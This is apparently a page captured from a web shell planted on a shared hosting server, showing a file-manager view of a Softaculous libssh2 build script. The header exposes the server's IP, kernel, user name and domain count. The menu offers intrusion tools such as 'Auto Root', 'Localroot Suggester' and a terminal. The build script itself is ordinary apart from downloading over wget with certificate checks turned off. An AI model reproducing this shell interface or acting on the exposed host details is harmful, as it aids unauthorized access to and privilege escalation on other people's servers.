Linux sagir-us1.hostever.us 5.14.0-570.51.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Oct 8 09:41:34 EDT 2025 x86_64
LiteSpeed
Server IP : 104.247.108.91 & Your IP : 216.73.216.26
Domains : 74 Domain
User : georgeto
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
softaculous /
apps /
libssh /
build /
Delete
Unzip
Name
Size
Permission
Date
Action
make.sh
864
B
-rwxr-xr-x
2024-07-16 05:45
Save
Rename
#!/bin/bash source /var/softaculous/apps/build/common.sh #Version libssh=libssh2-1.11.0 is_file $AMPPS_PATH"/lib/libssh2.so" if [ $? == 0 ] then # Libraries #openssl banner "Installing libssh" cd $SRC_PATH remove_dir $libssh is_file $libssh.tar.gz if [ $? == 0 ] then banner $libssh".tar.gz Downloading" wget --no-check-certificate -O $SRC_PATH/$libssh.tar.gz https://www.libssh2.org/download/$libssh.tar.gz>> $LOG 2>&1 fi tar -zxf $libssh.tar.gz cd $libssh LDFLAGS="-L$AMPPS_PATH/openssl-30/lib -L$AMPPS_PATH/lib" CPPFLAGS="-I$AMPPS_PATH/openssl-30/include -I$AMPPS_PATH/include " ./configure --prefix=$AMPPS_PATH --with-openssl --with-libssl-prefix=$AMPPS_PATH/openssl-30 && make && make install >> $LOG 2>&1 fi is_file $AMPPS_PATH"/lib/libssh2.so" if [ $? == 0 ] then banner 'libssh2 could not be installed due to some reason' exit 1 fi